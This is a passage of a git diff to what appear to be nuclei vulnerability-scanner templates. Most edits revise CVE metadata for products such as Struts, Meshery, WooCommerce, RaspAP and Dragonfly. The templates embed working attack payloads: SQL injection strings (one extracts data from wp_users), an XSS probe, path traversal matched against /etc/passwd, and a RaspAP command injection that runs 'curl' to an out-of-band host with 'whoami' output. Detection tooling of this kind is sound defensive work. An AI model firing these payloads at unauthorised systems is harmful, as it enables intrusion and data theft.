-    if a developer applied forced OGNL evaluation by using the %{...} syntax.
+  description: Apache Struts2 S2-062 is vulnerable to remote code execution. The fix issued for CVE-2020-17530 (S2-061) was incomplete, meaning some of the tag's attributes could still perform a double evaluation if a developer applied forced OGNL evaluation by using the %{...} syntax.
   reference:
     - https://cwiki.apache.org/confluence/display/WW/S2-062
     - https://github.com/Axx8/Struts2_S2-062_CVE-2021-31805
     - https://nvd.nist.gov/vuln/detail/CVE-2021-31805
+  remediation: Avoid using forced OGNL evaluation on untrusted user input, and/or upgrade to Struts 2.5.30 or greater which checks if expression evaluation won't lead to the double evaluation.
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2021-31805
     cwe-id: CWE-917
-  remediation: Avoid using forced OGNL evaluation on untrusted user input, and/or upgrade to Struts 2.5.30 or greater which checks if expression evaluation won't lead to the double evaluation.
   tags: cve,cve2021,apache,rce,struts,struts2
 
 requests:
diff --git a/cves/2021/CVE-2021-31856.yaml b/cves/2021/CVE-2021-31856.yaml
index b24d75aa6b..cd02013873 100644
--- a/cves/2021/CVE-2021-31856.yaml
+++ b/cves/2021/CVE-2021-31856.yaml
@@ -1,14 +1,16 @@
 id: CVE-2021-31856
 
 info:
-  name: Layer5 Meshery 0.5.2 SQLi
+  name: Layer5 Meshery 0.5.2 - SQL Injection
   author: princechaddha
   severity: critical
-  description: A SQL Injection vulnerability in the REST API in Layer5 Meshery 0.5.2 allows an attacker to execute arbitrary SQL commands via the /experimental/patternfiles endpoint (order parameter in GetMesheryPatterns
+  description: Layer5 Meshery 0.5.2 contains a SQL injection vulnerability in the REST API that allows an attacker to execute arbitrary SQL commands via the /experimental/patternfiles endpoint (order parameter in GetMesheryPatterns
     in models/meshery_pattern_persister.go).
   reference:
     - https://github.com/ssst0n3/CVE-2021-31856
     - https://nvd.nist.gov/vuln/detail/CVE-2021-31856
+    - https://meshery.io
+    - https://github.com/layer5io/meshery/pull/2745
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
@@ -16,19 +18,24 @@ info:
     cwe-id: CWE-89
   tags: sqli,cve,cve2021
 
+variables:
+  num: "999999999"
+
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/api/experimental/patternfile?order=id%3Bselect(md5('nuclei'))&page=0&page_size=0"
+      - "{{BaseURL}}/api/experimental/patternfile?order=id%3Bselect(md5({{num}}))&page=0&page_size=0"
 
     matchers-condition: and
     matchers:
 
       - type: word
         words:
-          - "709b38b27304df6257a86a60df742c4c"
+          - '{{md5({{num}})}}'
         part: body
 
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/05/17
diff --git a/cves/2021/CVE-2021-31862.yaml b/cves/2021/CVE-2021-31862.yaml
index c61c524dec..5e6170d84a 100644
--- a/cves/2021/CVE-2021-31862.yaml
+++ b/cves/2021/CVE-2021-31862.yaml
@@ -1,12 +1,13 @@
 id: CVE-2021-31862
 
 info:
-  name: SysAid - Reflected XSS
+  name: SysAid 20.4.74 - Cross-Site Scripting
   author: jas37
   severity: medium
-  description: SysAid 20.4.74 allows XSS via the KeepAlive.jsp stamp parameter without any authentication.
+  description: SysAid 20.4.74 contains a reflected cross-site scripting vulnerability via the KeepAlive.jsp stamp parameter.
   reference:
     - https://github.com/RobertDra/CVE-2021-31862/blob/main/README.md
+    - https://www.sysaid.com/product/on-premise/latest-release
     - https://nvd.nist.gov/vuln/detail/CVE-2021-31862
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
@@ -26,4 +27,6 @@ requests:
         dsl:
           - '(body == "false <script>alert(document.domain)</script>")'
           - 'status_code == 200'
-        condition: and
\ No newline at end of file
+        condition: and
+
+# Enhanced by mp on 2022/08/28
diff --git a/cves/2021/CVE-2021-32030.yaml b/cves/2021/CVE-2021-32030.yaml
index a999d024e3..6dc97ac75f 100644
--- a/cves/2021/CVE-2021-32030.yaml
+++ b/cves/2021/CVE-2021-32030.yaml
@@ -8,6 +8,8 @@ info:
   reference:
     - https://www.atredis.com/blog/2021/4/30/asus-authentication-bypass
     - https://nvd.nist.gov/vuln/detail/CVE-2021-32030
+    - https://github.com/atredispartners/advisories/blob/master/ATREDIS-2020-0010.md
+    - https://www.asus.com/Networking-IoT-Servers/WiFi-Routers/ASUS-Gaming-Routers/RT-AC2900/HelpDesk_BIOS/
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
diff --git a/cves/2021/CVE-2021-32172.yaml b/cves/2021/CVE-2021-32172.yaml
index 71b8fb8464..e5bbb54bfc 100644
--- a/cves/2021/CVE-2021-32172.yaml
+++ b/cves/2021/CVE-2021-32172.yaml
@@ -1,10 +1,10 @@
 id: CVE-2021-32172
 
 info:
-  name: Maian Cart 3.8 preauth RCE
+  name: Maian Cart <=3.8 - Remote Code Execution
   author: pdteam
   severity: critical
-  description: A severe vulnerability has been kindly reported to me by security advisor DreyAnd. The issue concerns the elFinder file manager plugin in Maian Cart and it affects all versions from 3.0 to 3.8.
+  description: Maian Cart 3.0 to 3.8 via the elFinder file manager plugin contains a remote code execution vulnerability.
   reference:
     - https://dreyand.github.io/maian-cart-rce/
     - https://github.com/DreyAnd/maian-cart-rce
@@ -53,3 +53,5 @@ requests:
           - 'contains(body_3, "{{randstr_1}}")'
           - "status_code_3 == 200"
         condition: and
+
+# Enhanced by mp on 2022/05/18
diff --git a/cves/2021/CVE-2021-3223.yaml b/cves/2021/CVE-2021-3223.yaml
index 256ea08ecb..1c503afb8d 100644
--- a/cves/2021/CVE-2021-3223.yaml
+++ b/cves/2021/CVE-2021-3223.yaml
@@ -1,19 +1,25 @@
 id: CVE-2021-3223
 
 info:
-  name: Node RED Dashboard - Directory Traversal
+  name: Node RED Dashboard <2.26.2 - Local File Inclusion
   author: gy741,pikpikcu
   severity: high
-  description: Node-RED-Dashboard before 2.26.2 allows ui_base/js/..%2f directory traversal to read files.
+  description: NodeRED-Dashboard before 2.26.2 is vulnerable to local file inclusion because it allows ui_base/js/..%2f directory traversal to read files.
   reference:
     - https://github.com/node-red/node-red-dashboard/issues/669
     - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3223
+    - https://github.com/node-red/node-red-dashboard/releases/tag/2.26.2
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-3223
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
     cve-id: CVE-2021-3223
     cwe-id: CWE-22
-  tags: cve,cve2020,node-red-dashboard,lfi
+  metadata:
+    verified: true
+    shodan-query: title:"Node-RED"
+    fofa-query: title="Node-RED"
+  tags: cve,cve2021,node-red-dashboard,lfi
 
 requests:
   - method: GET
@@ -32,3 +38,5 @@ requests:
         part: body
         words:
           - "Node-RED web server is listening"
+
+# Enhanced by mp on 2022/07/15
diff --git a/cves/2021/CVE-2021-32305.yaml b/cves/2021/CVE-2021-32305.yaml
index dd19c4c938..6f581369b1 100644
--- a/cves/2021/CVE-2021-32305.yaml
+++ b/cves/2021/CVE-2021-32305.yaml
@@ -1,19 +1,21 @@
 id: CVE-2021-32305
 
 info:
-  name: Websvn 2.6.0 - Remote Code Execution (Unauthenticated)
+  name: Websvn <2.6.1 - Remote Code Execution
   author: gy741
   severity: critical
   description: WebSVN before 2.6.1 allows remote attackers to execute arbitrary commands via shell metacharacters in the search parameter.
   reference:
-    - https://nvd.nist.gov/vuln/detail/CVE-2021-32305
     - https://packetstormsecurity.com/files/163225/Websvn-2.6.0-Remote-Code-Execution.html
+    - https://github.com/websvnphp/websvn/pull/142
+    - http://packetstormsecurity.com/files/163225/Websvn-2.6.0-Remote-Code-Execution.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-32305
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2021-32305
     cwe-id: CWE-78
-  tags: cve,cve2021,websvn,rce,oast
+  tags: cve,cve2021,websvn,rce,oast,packetstorm
 
 requests:
   - raw:
@@ -28,3 +30,5 @@ requests:
         part: interactsh_protocol  # Confirms the HTTP Interaction
         words:
           - "http"
+
+# Enhanced by mp on 2022/05/18
diff --git a/cves/2021/CVE-2021-32618.yaml b/cves/2021/CVE-2021-32618.yaml
index 87f4c0da7f..9516d961a3 100644
--- a/cves/2021/CVE-2021-32618.yaml
+++ b/cves/2021/CVE-2021-32618.yaml
@@ -6,7 +6,7 @@ info:
   severity: medium
   description: There is code in FS to validate that the url specified in the next parameter is either relative OR has the same netloc (network location) as the requesting URL. This check utilizes Pythons urlsplit
     library. However many browsers are very lenient on the kind of URL they accept and 'fill in the blanks' when presented with a possibly incomplete URL. As a concrete example - setting http://login?next=\\\github.com
-    will pass FS's relative URL check however many browsers will gladly convert this to http://example.com.
+    will pass FS's relative URL check however many browsers will gladly convert this to http://interact.sh.
   reference:
     - https://github.com/Flask-Middleware/flask-security/security/advisories/GHSA-6qmf-fj6m-686c
     - https://github.com/Flask-Middleware/flask-security/issues/486
@@ -21,10 +21,10 @@ info:
 requests:
   - method: GET
     path:
-      - '{{BaseURL}}/login?next=\\\example.com'
+      - '{{BaseURL}}/login?next=\\\interact.sh'
 
     matchers:
       - type: regex
         part: header
         regex:
-          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
\ No newline at end of file
+          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
\ No newline at end of file
diff --git a/cves/2021/CVE-2021-32682.yaml b/cves/2021/CVE-2021-32682.yaml
index acdfb7a35f..d5903bdecb 100644
--- a/cves/2021/CVE-2021-32682.yaml
+++ b/cves/2021/CVE-2021-32682.yaml
@@ -4,19 +4,18 @@ info:
   name: elFinder 2.1.58 - Remote Code Execution
   author: smaranchand
   severity: critical
-  description: elFinder 2.1.58 is impacted by multiple remote code execution vulnerabilities that could allow an attacker to execute arbitrary code and commands on the server hosting the elFinder PHP connector, even
-    with minimal configuration.
+  description: elFinder 2.1.58 is impacted by multiple remote code execution vulnerabilities that could allow an attacker to execute arbitrary code and commands on the server hosting the elFinder PHP connector, even with minimal configuration.
   reference:
     - https://smaranchand.com.np/2022/01/organization-vendor-application-security/
     - https://blog.sonarsource.com/elfinder-case-study-of-web-file-manager-vulnerabilities
     - https://github.com/Studio-42/elFinder/security/advisories/GHSA-wph3-44rj-92pr
     - https://nvd.nist.gov/vuln/detail/CVE-2021-32682
+  remediation: Update to elFinder 2.1.59 or later. As a workaround, ensure the connector is not exposed without authentication.
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2021-32682
     cwe-id: CWE-22,CWE-78,CWE-918
-  remediation: Update to elFinder 2.1.59 or later. As a workaround, ensure the connector is not exposed without authentication.
   metadata:
     github: https://github.com/Studio-42/elFinder
   tags: cve,cve2021,elfinder,misconfig,rce,oss
diff --git a/vulnerabilities/wordpress/wordpress-woocommerce-sqli.yaml b/cves/2021/CVE-2021-32789.yaml
similarity index 53%
rename from vulnerabilities/wordpress/wordpress-woocommerce-sqli.yaml
rename to cves/2021/CVE-2021-32789.yaml
index 8a96cfe510..0ca835d4dd 100644
--- a/vulnerabilities/wordpress/wordpress-woocommerce-sqli.yaml
+++ b/cves/2021/CVE-2021-32789.yaml
@@ -1,24 +1,27 @@
-id: wordpress-woocommerce-sqli
+id: CVE-2021-32789
 
 info:
-  name: Woocommerce Unauthenticated SQL Injection
+  name: WooCommerce Blocks 2.5 to 5.5 - Unauthenticated SQL Injection
   author: rootxharsh,iamnoooob,S1r1u5_,cookiehanhoan,madrobot
-  severity: critical
-  description: The Woocommerce plugin for Wordpress contains an unauthenticated SQL injection vulnerability.
+  severity: high
+  description: |
+    woocommerce-gutenberg-products-block is a feature plugin for WooCommerce Gutenberg Blocks. An SQL injection vulnerability impacts all WooCommerce sites running the WooCommerce Blocks feature plugin between version 2.5.0 and prior to version 2.5.16. Via a carefully crafted URL, an exploit can be executed against the `wc/store/products/collection-data?calculate_attribute_counts[][taxonomy]` endpoint that allows the execution of a read only sql query. There are patches for many versions of this package, starting with version 2.5.16. There are no known workarounds aside from upgrading.
   reference:
     - https://woocommerce.com/posts/critical-vulnerability-detected-july-2021
     - https://viblo.asia/p/phan-tich-loi-unauthen-sql-injection-woocommerce-naQZRQyQKvx
     - https://securitynews.sonicwall.com/xmlpost/wordpress-woocommerce-plugin-sql-injection/
+    - https://wpscan.com/vulnerability/0f2089dc-9376-4d7d-95a2-25c99526804a
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-32789
   classification:
-    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
-    cvss-score: 10.0
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2021-32789
     cwe-id: CWE-89
-  tags: wordpress,woocommerce,sqli,wp-plugin,injection
+  tags: cve,cve2021,wordpress,woocommerce,sqli,wp-plugin,wp,wpscan
 
 requests:
   - method: GET
     path:
-      - '{{BaseURL}}/wp-json/wc/store/products/collection-data?calculate_attribute_counts[0][query_type]=or&calculate_attribute_counts[0][taxonomy]=%252522%252529%252520union%252520all%252520select%2525201%25252Cconcat%252528id%25252C0x3a%25252c%252522sqli-test%252522%252529from%252520wp_users%252520where%252520%252549%252544%252520%252549%25254E%252520%2525281%252529%25253B%252500'
       - '{{BaseURL}}/?rest_route=/wc/store/products/collection-data&calculate_attribute_counts[0][query_type]=or&calculate_attribute_counts[0][taxonomy]=%252522%252529%252520union%252520all%252520select%2525201%25252Cconcat%252528id%25252C0x3a%25252c%252522sqli-test%252522%252529from%252520wp_users%252520where%252520%252549%252544%252520%252549%25254E%252520%2525281%252529%25253B%252500'
 
     matchers-condition: and
@@ -32,9 +35,9 @@ requests:
         condition: and
 
       - type: word
+        part: header
         words:
           - 'application/json'
-        part: header
 
       - type: status
         status:
diff --git a/cves/2021/CVE-2021-32819.yaml b/cves/2021/CVE-2021-32819.yaml
index 8c3b722203..8ff5e004ad 100644
--- a/cves/2021/CVE-2021-32819.yaml
+++ b/cves/2021/CVE-2021-32819.yaml
@@ -1,17 +1,16 @@
 id: CVE-2021-32819
 
 info:
-  name: Nodejs squirrelly template engine RCE
+  name: Nodejs Squirrelly - Remote Code Execution
   author: pikpikcu
   severity: high
   description: |
-    Squirrelly is a template engine implemented in JavaScript that works out of the box with ExpressJS. Squirrelly mixes pure template data with engine configuration
-    options through the Express render API. By overwriting internal configuration options remote code execution may be triggered in downstream applications. There is
-    currently no fix for these issues as of the publication of this CVE. The latest version of squirrelly is currently 8.0.8. For complete details refer to the referenced GHSL-2021-023.
+    Nodejs Squirrelly is susceptible to remote code execution. Squirrelly is a template engine implemented in JavaScript that works out of the box with ExpressJS. Squirrelly mixes pure template data with engine configuration options through the Express render API. By overwriting internal configuration options remote code execution may be triggered in downstream applications. There is currently no fix for these issues as of the publication of this CVE. The latest version of squirrelly is currently 8.0.8. For complete details refer to the referenced GHSL-2021-023.
   reference:
     - https://securitylab.github.com/advisories/GHSL-2021-023-squirrelly/
     - https://www.linuxlz.com/aqld/2331.html
     - https://blog.diefunction.io/vulnerabilities/ghsl-2021-023
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-32819
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
     cvss-score: 8.8
@@ -27,4 +26,6 @@ requests:
       - type: word
         part: interactsh_protocol # Confirms the HTTP Interaction
         words:
-          - "http"
\ No newline at end of file
+          - "http"
+
+# Enhanced by mp on 2022/06/30
diff --git a/cves/2021/CVE-2021-32820.yaml b/cves/2021/CVE-2021-32820.yaml
index 574834c680..2fd83b092c 100644
--- a/cves/2021/CVE-2021-32820.yaml
+++ b/cves/2021/CVE-2021-32820.yaml
@@ -1,16 +1,15 @@
 id: CVE-2021-32820
 
 info:
-  name: Express-handlebars Path Traversal
+  name: Express-handlebars - Local File Inclusion
   author: dhiyaneshDk
   severity: high
-  description: Express-handlebars is a Handlebars view engine for Express. Express-handlebars mixes pure template data with engine configuration options through the Express render API. More specifically, the layout
-    parameter may trigger file disclosure vulnerabilities in downstream applications. This potential vulnerability is somewhat restricted in that only files with existing extensions (i.e., file.extension) can be
-    included. Files that lack an extension will have .handlebars appended to them. For complete details refer to the referenced GHSL-2021-018 report. Notes in documentation have been added to help users avoid this
-    potential information exposure vulnerability.
+  description: Express-handlebars is susceptible to local file inclusion because it mixes pure template data with engine configuration options through the Express render API. More specifically, the layout parameter may trigger file disclosure vulnerabilities in downstream applications. This potential vulnerability is somewhat restricted in that only files with existing extensions (i.e., file.extension) can be included. Files that lack an extension will have .handlebars appended to them. For complete details refer to the referenced GHSL-2021-018 report. Notes in documentation have been added to help users avoid this potential information exposure vulnerability.
   reference:
     - https://securitylab.github.com/advisories/GHSL-2021-018-express-handlebars/
     - https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/CVE-2021-32820.json
+    - https://github.com/express-handlebars/express-handlebars/pull/163
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-32820
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
     cvss-score: 8.6
@@ -25,14 +24,16 @@ requests:
 
     matchers-condition: and
     matchers:
-      - type: status
-        status:
-          - 200
 
       - type: regex
+        part: body
         regex:
           - "root:.*:0:0:"
           - "daemon:[x*]:0:0:"
           - "operator:[x*]:0:0:"
-        part: body
         condition: or
+
+      - type: status
+        status:
+          - 200
+# Enhanced by mp on 2022/06/30
diff --git a/cves/2021/CVE-2021-32853.yaml b/cves/2021/CVE-2021-32853.yaml
index 3bc5300c3d..ca5084210a 100644
--- a/cves/2021/CVE-2021-32853.yaml
+++ b/cves/2021/CVE-2021-32853.yaml
@@ -1,10 +1,10 @@
 id: CVE-2021-32853
 
 info:
-  name: Erxes <= v0.23.0 XSS
+  name: Erxes <0.23.0 - Cross-Site Scripting
   author: dwisiswant0
   severity: medium
-  description: Erxes prior to version 0.23.0 is vulnerable to cross-site scripting.The value of topicID parameter is not escaped & triggered in the enclosing script tag.
+  description: Erxes before 0.23.0 contains a cross-site scripting vulnerability. The value of topicID parameter is not escaped and is triggered in the enclosing script tag.
   reference:
     - https://securitylab.github.com/advisories/GHSL-2021-103-erxes/
     - https://nvd.nist.gov/vuln/detail/CVE-2021-3285
@@ -36,3 +36,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/28
diff --git a/cves/2021/CVE-2021-3297.yaml b/cves/2021/CVE-2021-3297.yaml
index 7b87338068..499d6cf62b 100644
--- a/cves/2021/CVE-2021-3297.yaml
+++ b/cves/2021/CVE-2021-3297.yaml
@@ -4,10 +4,12 @@ info:
   name: Zyxel NBG2105 V1.00(AAGU.2)C0 - Authentication Bypass
   author: gy741
   severity: high
-  description: On Zyxel NBG2105 V1.00(AAGU.2)C0 devices, setting the login cookie to 1 provides administrator access.
+  description: Zyxel NBG2105 V1.00(AAGU.2)C0 devices are susceptible to authentication bypass vulnerabilities because setting the login cookie to 1 provides administrator access.
   reference:
-    - https://nvd.nist.gov/vuln/detail/CVE-2021-3297
     - https://github.com/nieldk/vulnerabilities/blob/main/zyxel%20nbg2105/Admin%20bypass
+    - https://www.zyxel.com/us/en/support/security_advisories.shtml
+    - https://www.zyxel.com/support/SupportLandingSR.shtml?c=gb&l=en&kbid=M-01490&md=NBG2105
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-3297
   classification:
     cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 7.8
@@ -24,9 +26,6 @@ requests:
 
     matchers-condition: and
     matchers:
-      - type: status
-        status:
-          - 200
 
       - type: word
         words:
@@ -34,3 +33,9 @@ requests:
           - "Firmware Version"
           - "Firmware Build Time"
         condition: and
+
+      - type: status
+        status:
+          - 200
+
+# Enhanced by mp on 2022/06/30
diff --git a/cves/2021/CVE-2021-33044.yaml b/cves/2021/CVE-2021-33044.yaml
index fc6872f12b..6732351f62 100644
--- a/cves/2021/CVE-2021-33044.yaml
+++ b/cves/2021/CVE-2021-33044.yaml
@@ -1,20 +1,21 @@
 id: CVE-2021-33044
 
 info:
-  name: Dahua IPC/VTH/VTO devices Authentication Bypass
+  name: Dahua IPC/VTH/VTO - Authentication Bypass
   author: gy741
   severity: critical
-  description: The identity authentication bypass vulnerability found in some Dahua products during the login process. Attackers can bypass device identity authentication by constructing malicious data packets.
+  description: Some Dahua products contain an authentication bypass during the login process. Attackers can bypass device identity authentication by constructing malicious data packets.
   reference:
     - https://github.com/dorkerdevil/CVE-2021-33044
     - https://nvd.nist.gov/vuln/detail/CVE-2021-33044
     - https://seclists.org/fulldisclosure/2021/Oct/13
+    - https://www.dahuasecurity.com/support/cybersecurity/details/957
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2021-33044
     cwe-id: CWE-287
-  tags: dahua,cve,cve2021,auth-bypass
+  tags: dahua,cve,cve2021,auth-bypass,seclists
 
 requests:
   - raw:
@@ -52,3 +53,5 @@ requests:
         part: body
         regex:
           - ',"result":true,"session":"([a-z]+)"\}'
+
+# Enhanced by cs on 2022/06/01
diff --git a/cves/2021/CVE-2021-33221.yaml b/cves/2021/CVE-2021-33221.yaml
index 9bfd19ae24..ea34de76d2 100644
--- a/cves/2021/CVE-2021-33221.yaml
+++ b/cves/2021/CVE-2021-33221.yaml
@@ -1,19 +1,21 @@
 id: CVE-2021-33221
 
 info:
-  name: CommScope Ruckus IoT Controller Unauthenticated Service Details
+  name: CommScope Ruckus IoT Controller - Information Disclosure
   author: geeknik
   severity: critical
-  description: A 'service details' API endpoint discloses system and configuration information to an attacker without requiring authentication. This information includes DNS and NTP servers that the devices use for
-    time and host resolution. It also includes the internal hostname and IoT Controller version. A fully configured device in production may leak other, more sensitive information (API keys and tokens).
+  description: CommScope Ruckus IoT Controller is susceptible to information disclosure vulnerabilities because a 'service details' API endpoint discloses system and configuration information to an attacker without requiring authentication. This information includes DNS and NTP servers that the devices use for time and host resolution. It also includes the internal hostname and IoT Controller version. A fully configured device in production may leak other, more sensitive information (API keys and tokens).
   reference:
     - https://www.commscope.com/globalassets/digizuite/917216-faq-security-advisory-id-20210525-v1-0.pdf
+    - http://seclists.org/fulldisclosure/2021/May/72
+    - https://korelogic.com/advisories.html
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33221
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2021-33221
     cwe-id: CWE-306
-  tags: cve,cve2021,commscope,ruckus,debug,service,leak
+  tags: cve2021,commscope,ruckus,debug,service,leak,seclists,cve
 
 requests:
   - method: GET
@@ -37,3 +39,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/05/18
diff --git a/cves/2021/CVE-2021-33357.yaml b/cves/2021/CVE-2021-33357.yaml
index a29bf15f9b..352972c349 100644
--- a/cves/2021/CVE-2021-33357.yaml
+++ b/cves/2021/CVE-2021-33357.yaml
@@ -1,16 +1,16 @@
 id: CVE-2021-33357
 
 info:
-  name: RaspAP <= 2.6.5 - Remote Code Execution
+  name: RaspAP <=2.6.5 - Remote Command Injection
   author: pikpikcu,pdteam
   severity: critical
   description: |
-    RaspAP 2.6 to 2.6.5 in the "iface" GET parameter in /ajax/networking/get_netcfg.php, when the "iface" parameter value contains special characters such as ";" which enables an unauthenticated attacker to execute arbitrary OS commands.
+    RaspAP 2.6 to 2.6.5 allows unauthenticated attackers to execute arbitrary OS commands via the "iface" GET parameter in /ajax/networking/get_netcfg.php, when the "iface" parameter value contains special characters such as ";".
   reference:
     - https://checkmarx.com/blog/chained-raspap-vulnerabilities-grant-root-level-access/
     - https://gist.github.com/omriinbar/52c000c02a6992c6ce68d531195f69cf
-    - https://nvd.nist.gov/vuln/detail/CVE-2021-33357
     - https://github.com/RaspAP/raspap-webgui
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-33357
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
@@ -21,7 +21,7 @@ info:
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/ajax/networking/get_netcfg.php?iface=;curl%20http://{{interactsh-url}}/`whoami`;"
+      - "{{BaseURL}}/ajax/networking/get_netcfg.php?iface=;curl%20{{interactsh-url}}/`whoami`;"
 
     matchers-condition: and
     matchers:
@@ -39,4 +39,6 @@ requests:
         part: interactsh_request
         group: 1
         regex:
-          - 'GET \/([a-z-]+) HTTP'
\ No newline at end of file
+          - 'GET \/([a-z-]+) HTTP'
+
+# Enhanced by mp on 2022/05/18
diff --git a/cves/2021/CVE-2021-33544.yaml b/cves/2021/CVE-2021-33544.yaml
index ce7f41eb97..46a87855dc 100644
--- a/cves/2021/CVE-2021-33544.yaml
+++ b/cves/2021/CVE-2021-33544.yaml
@@ -1,12 +1,15 @@
 id: CVE-2021-33544
 
 info:
-  name: Geutebruck RCE
+  name: Geutebruck - Remote Command Injection
   author: gy741
   severity: high
-  description: Multiple vulnerabilities in the web-based management interface of Geutebruck could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device.
+  description: Geutebruck is susceptible to multiple vulnerabilities its web-based management interface that could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device.
   reference:
     - https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/
+    - https://www.randorisec.fr/fr/udp-technology-ip-camera-vulnerabilities/
+    - https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-33544
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 7.2
@@ -26,3 +29,5 @@ requests:
         part: interactsh_protocol # Confirms the HTTP Interaction
         words:
           - "http"
+
+# Enhanced by mp on 2022/06/30
diff --git a/cves/2021/CVE-2021-33564.yaml b/cves/2021/CVE-2021-33564.yaml
index be3afff3c9..f8c09008f5 100644
--- a/cves/2021/CVE-2021-33564.yaml
+++ b/cves/2021/CVE-2021-33564.yaml
@@ -1,13 +1,16 @@
 id: CVE-2021-33564
 
 info:
-  name: Argument Injection in Ruby Dragonfly
+  name: Ruby Dragonfly <1.4.0 - Remote Code Execution
   author: 0xsapra
   severity: critical
-  description: An argument injection vulnerability in the Dragonfly gem before 1.4.0 for Ruby allows remote attackers to read and write to arbitrary files via a crafted URL when the verify_url option is disabled.
-    This may lead to code execution. The problem occurs because the generate and process features mishandle use of the ImageMagick convert utility.
+  description: Ruby Dragonfly before 1.4.0 contains an argument injection vulnerability that allows remote attackers to read and write to arbitrary files via a crafted URL when the verify_url option is disabled. This may lead to code execution. The problem occurs because the generate and process features mishandle use of the ImageMagick convert utility.
   reference:
     - https://zxsecurity.co.nz/research/argunment-injection-ruby-dragonfly/
+    - https://github.com/markevans/dragonfly/compare/v1.3.0...v1.4.0
+    - https://github.com/markevans/dragonfly/commit/25399297bb457f7fcf8e3f91e85945b255b111b5
+    - https://github.com/mlr0p/CVE-2021-33564
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-33564
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
@@ -29,3 +32,5 @@ requests:
       - type: regex
         regex:
           - "root:.*:0:0:"
+
+# Enhanced by mp on 2022/05/18
diff --git a/cves/2021/CVE-2021-3374.yaml b/cves/2021/CVE-2021-3374.yaml
index 22d3fa18fa..21d6a8d0cb 100644
--- a/cves/2021/CVE-2021-3374.yaml
+++ b/cves/2021/CVE-2021-3374.yaml
@@ -1,12 +1,14 @@
 id: CVE-2021-3374
 
 info:
-  name: Rstudio Shiny Server Directory Traversal
+  name: Rstudio Shiny Server <1.5.16 - Local File Inclusion
   author: geeknik
   severity: medium
-  description: Rstudio Shiny-Server prior to 1.5.16 is vulnerable to directory traversal and source code leakage. This can be exploited by appending an encoded slash to the URL.
+  description: Rstudio Shiny Server prior to 1.5.16 is vulnerable to local file inclusion and source code leakage. This can be exploited by appending an encoded slash to the URL.
   reference:
-    - https://github.com/colemanjp/rstudio-shiny-server-directory-traversal-source-code-leak
+    - https://github.com/colemanjp/shinyserver-directory-traversal-source-code-leak
+    - https://blog.rstudio.com/2021/01/13/shiny-server-1-5-16-update/
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-3374
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
     cvss-score: 5.3
@@ -32,3 +34,5 @@ requests:
         part: body
         regex:
           - "[A-Za-z].*\\.R"
+
+# Enhanced by mp on 2022/07/22
